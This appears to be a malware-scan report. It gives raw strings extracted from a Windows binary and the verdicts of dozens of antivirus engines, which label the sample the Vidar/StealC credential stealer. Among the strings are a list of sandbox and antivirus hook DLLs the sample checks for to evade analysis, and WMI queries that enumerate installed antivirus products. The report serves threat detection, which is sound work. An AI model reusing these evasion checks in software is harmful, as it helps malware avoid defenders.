3$353F3Z3k3}3
?,?2?8?F?O?a?
151<1H1O1d1k1s1
2)202X2_2k2r2
3D3K3R3a3h3v3}3
42595A5V5
7.757G7N7V7]7s7
8/8J8R8Y8o8
8#9Z9l9
;#;A;H;a;h;s;
;3<:<I<
=.=5===D=W=_=f=y=
>%>S>e>V?
242Q2a2
3"3)3/3:3M3U3\3a3l3
364@4Z4
6+686E6e6
7:8O8g8
:Y;g;q;
<E=,>>>
w0*191
2^3o3E4
5.5B5W5o5K6
;,<<<I<V<~<\=l=
0!0F0~0
2$2=2P2W2a2
3#3E3O3s3z3
4+464h4r4
5G5N5T5m5
767=7V7z7
8 9/9B9I9g9y9
;*;Q;a;s;
<,<7<B<M<Z<a<j<q<
>W?^?q?|?
1)181E1
2/262f2
5'545C5^5p5
686F6z6
9 9,939=9o9
;<-<V<
<:=E=K=
?-?>?c?y?
0#0-040<0C0v0
0=1D1i1p1
525\5{5
7X8\8`8d8h8l8v8
9-949I9P9s9z9
9<:@:D:H:L:P:T:X:\:`:d:h:v:
;#;7;K;_;s;
+0S0h0
;&;,;:;
;P<`<m<
>*?9?P?|?
7&71797E7M7
6L7p7|7
8(8F8M8X8_8l8
9>9M9l9
<+<Y<x<~<
<#=r=6>V?
+090?0M0a0o0t0
262@2e2k2y2
4'4a4n4w4
55-535A5K5Y5&6
8,8:8Q8
9!9(999W9e9j9w9
:9;J;X;^;c;q;
<$<*<;<V<\<m<
<9=I=V=[=`=l=
=I>Y>f>k>p>|>
0*030H0M0`1
9$9>9L9T9q9w9|9
:!:':,:1:9:?:D:I:Q:W:]:d:j:p:u:z:
;;$;,;2;8;?;E;K;P;U;];c;h;m;u;{;
<$<)<.<6<;<@<J<R<W<\<f<n<s<x<
= =(=.=4=;=A=G=L=Q=Y=_=d=i=q=w=}=
>">'>,>4>:>?>D>L>R>X>_>e>k>p>u>}>
??'?-?3?:?@?E?J?P?X?^?c?h?p?v?|?
0!0&0+03090>0C0K0Q0W0^0d0j0o0t0|0
1#1)1/151;1A1F1K1R1W1\1b1g1l1v1~1
2#2*20262;2@2H2N2S2X2`2f2l2s2y2
3&3+303>3F3L3Q3V3^3d3j3q3w3}3
4!4)4/44494A4G4M4T4Z4`4e4j4r4x4}4
5 5%5*545<5B5G5L5T5Y5^5h5p5v5{5
6"6(6-626:6@6E6J6R6X6]6c6i6o6t6z6
7#7(7-757;7A7H7N7T7Y7^7f7k7p7y7
7"8'8-81878;8A8E8K8O8T8Z8^8d8h8n8r8x8|8
8&898q8
9N:k:K;U;b;
1#1,161j1u1
314=4P4b4}4
5,5U5f5z5
848E8~8
9&9;9a9
3.3g3q3
3e4n4z4
5U5m5w5
010C0U0g0y0
5b6h6v6
0W3[3_3c3g3k3o3s3w3{3
=%=0=<=A=Q=V=\=b=x=
5(5c5}5
<.<9<U<{<
5Y6d7<8
1"181N1b2t2z2
3$3*343:3E3R3X3d3s3}3
h1l1p1t1x1|1
`0d0h0
4 4$4(4,4044484<4@4D4H4L4P4T4X4\4`4d4h4l4p4t4x4|4
5 5$5(5,5054585<5@5D5H5L5P5T5X5\5`5d5h5l5p5
2$2,242@<D<
=0=4=L=\=`=t=x=
> >0>4>8><>D>\>l>p>
?$?,?4?<?D?L?T?\?d?l?t?|?
0$0,040<0D0L0T0\0d0l0t0|0
1,141<1D1L1T1\1d1l1x1
2$2,242<2D2L2T2`2
3$3,343<3D3L3T3\3d3l3t3|3
4$4,444<4D4L4T4\4d4l4t4|4
5$5,545<5D5L5T5\5d5l5t5|5
6<6D6L6T6\6h6
7 7(70787@7H7P7X7`7h7p7x7
7 8@8H8P8X8`8h8p8x8
9$9,949<9D9L9T9\9d9l9t9|9
: :(:0:8:@:H:P:X:`:h:p:x:
;$;,;4;<;D;L;T;\;d;l;t;
< <(<0<8<@<H<P<X<`<l<
=$=,=4=<=D=L=T=\=d=l=t=|=
> >(>0>8>@>H>P>X>`>h>p>x>
?$?,?4?@?`?h?p?x?
0 0(040T0\0d0l0t0|0
1(1H1P1X1`1h1p1x1
2$2,242<2D2L2T2\2d2l2t2|2
3(3H3P3X3`3h3p3x3
4 4(40484@4H4P4X4`4h4p4x4
5$5,545<5D5L5T5\5d5l5t5|5
6$6,646<6D6L6T6\6d6l6t6|6
7,747<7D7L7T7\7d7l7t7|7
8$8,848@8`8h8p8x8
9$9,949<9D9L9T9\9d9l9t9|9
:$:,:4:<:D:P:p:x:
; ;(;0;8;@;H;P;X;`;h;p;x;
< <(<0<8<@<H<P<X<`<h<p<x<
=$=,=4=<=D=L=T=\=d=l=t=
> >(>0>8>@>H>P>X>`>h>p>x>
?$?,?4?<?D?L?T?\?d?l?t?|?
0(0T0\0
1(10181@1L1l1t1|1
2 2@2H2P2\2|2
343@3H3d3
4$4,444<4D4L4T4\4d4p4
5 5(50585@5H5P5X5`5h5p5x5
6 6(60686@6H6P6X6`6h6p6x6
7$7,747<7D7L7T7\7d7l7t7|7
8 8(848T8\8d8l8t8|8
949<9D9L9T9\9d9l9t9|9
:$:,:8:X:d:
;,;L;T;\;d;l;t;|;
<$<,<4<<<D<L<T<\<d<l<t<|<
=$=,=4=<=D=L=T=\=d=l=t=|=
>$>,>4><>D>L>T>\>d>l>t>|>
? ?(?0?8?@?H?P?X?`?h?p?|?
0 0(00080@0H0P0X0`0h0p0x0
1 1(10181@1H1P1X1`1h1p1x1
2 2(20282@2H2P2X2`2h2p2x2
3$3,383X3`3
4$404P4X4`4h4p4x4
5 5(505<5\5d5l5t5|5
6$6,646<6D6L6T6\6d6l6t6|6
7$7,747<7T7X7x7
888X8x8
9$9,94989<9D9X9`9h9p9t9x9
080`0d0h0l0p0t0x0|0
7 7$7(7,7074787<7@7D7H7L7P7T7X7\7`7d7h7l7p7t7x7|7
8 8$8(8,8084888<8@8D8H8
9 9$9(9
; ;$;(;,;0;4;
avghookx.dll
avghooka.dll
snxhk.dll
sbiedll.dll
api_log.dll
dir_watch.dll
pstorec.dll
vmcheck.dll
wpespy.dll
cmdvrt32.dll
cmdvrt64.dll
ChainingModeGCM
ChainingMode
nROOT\CIMV2
Select * From Win32_OperatingSystem
InstallDate
nroot\SecurityCenter2
Select * From AntiVirusProduct
displayName
image/jpeg
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=
BHH:mm:ss
dddd, MMMM dd, yyyy
MM/dd/yy
December
November
October
September
August
February
January
Saturday
Friday
Thursday
Wednesday
Tuesday
Monday
Sunday
nKERNEL32.DLL
mscoree.dll
runtime error
TLOSS error
SING error
DOMAIN error
- Attempt to use MSIL code from this assembly during native code initialization
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
- not enough space for locale information
- Attempt to initialize the CRT more than once.
This indicates a bug in your application.
- CRT not initialized
- unable to initialize heap
- not enough space for lowio initialization
- not enough space for stdio initialization
- pure virtual function call
- not enough space for _onexit/atexit table
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
- not enough space for thread data
- abort() has been called
- not enough space for environment
- not enough space for arguments
- floating point support not loaded
BMicrosoft Visual C++ Runtime Library
<program name unknown>
Runtime Error!
Program:
((((( H
h(((( H
H
WUSER32.DLL
Antivirus Signature
Bkav W32.AIDetectMalware
Lionic Trojan.Win32.Vidar.4!c
tehtris Clean
ClamAV Win.Malware.Trojanx-10020177-0
CMC Clean
CAT-QuickHeal Clean
Skyhigh BehavesLike.Win32.Dropper.dh
ALYac Gen:Variant.Fragtor.498183
Cylance Unsafe
Zillya Trojan.Stealerc.Win32.32963
Sangfor Trojan.Win32.Fragtor.Vo0i
K7AntiVirus Trojan ( 005a977a1 )
Alibaba TrojanPSW:Win32/Stealerc.1aec6c23
K7GW Trojan ( 005a977a1 )
Cybereason malicious.c85bfa
Baidu Clean
VirIT Clean
Paloalto generic.ml
Symantec ML.Attribute.HighConfidence
Elastic Windows.Generic.Threat
ESET-NOD32 a variant of Win32/Vidar.A
APEX Malicious
Avast Win32:Vidar-A [CryptoStl]
Cynet Malicious (score: 99)
Kaspersky Trojan-PSW.Win32.Stealerc.ksp
BitDefender Gen:Variant.Fragtor.498183
NANO-Antivirus Trojan.Win32.Redcap.kmdmfk
ViRobot Clean
MicroWorld-eScan Gen:Variant.Fragtor.498183
Tencent Malware.Win32.Gencirc.1409c959
TACHYON Clean
Sophos Mal/Generic-S
F-Secure Trojan.TR/Redcap.xvqpd
DrWeb Trojan.PWS.Stealer.38809
VIPRE Gen:Variant.Fragtor.498183
TrendMicro TrojanSpy.Win32.VIDAR.YXEDXZ
McAfeeD Real Protect-LS!9EC7F08C85BF
Trapmine malicious.high.ml.score
FireEye Generic.mg.9ec7f08c85bfa1b2
Emsisoft Gen:Variant.Fragtor.498183 (B)
SentinelOne Static AI - Suspicious PE
GData Gen:Variant.Fragtor.498183
Jiangmin Clean
Webroot W32.Trojan.Gen
Varist W32/ABRisk.IDZY-1452
Avira TR/Redcap.xvqpd
Antiy-AVL Trojan[PSW]/Win32.Vidar
Kingsoft Win32.Troj.Unknown.a
Gridinsoft Spy.Win32.Vidar.tr
Xcitium Malware@#hvhruuheed8l
Arcabit Trojan.Fragtor.D79A07
SUPERAntiSpyware Clean
ZoneAlarm Trojan-PSW.Win32.Stealerc.ksp
Microsoft Trojan:Win32/StealC.SZ!MTB
Google Detected
AhnLab-V3 Trojan/Win.Stealc.C5616315
Acronis Clean
McAfee Artemis!9EC7F08C85BF
MAX malware (ai score=80)
VBA32 BScope.TrojanPSW.Mars
Malwarebytes Malware.AI.22261408
Panda Trj/GdSda.A
Zoner Clean
TrendMicro-HouseCall TrojanSpy.Win32.VIDAR.YXEDXZ
Rising Trojan.Vidar!8.114A8 (TFE:4:Cl4R3ucypxL)
Yandex Clean
Ikarus Trojan.Win32.Vidar
MaxSecure Clean
Fortinet W32/Vidar.A!tr
BitDefenderTheta AI:Packer.FE912C601F
AVG Win32:Vidar-A [CryptoStl]
DeepInstinct MALICIOUS
CrowdStrike win/malicious_confidence_100% (W)
alibabacloud Trojan:Win/Vidar.A
No IRMA results available.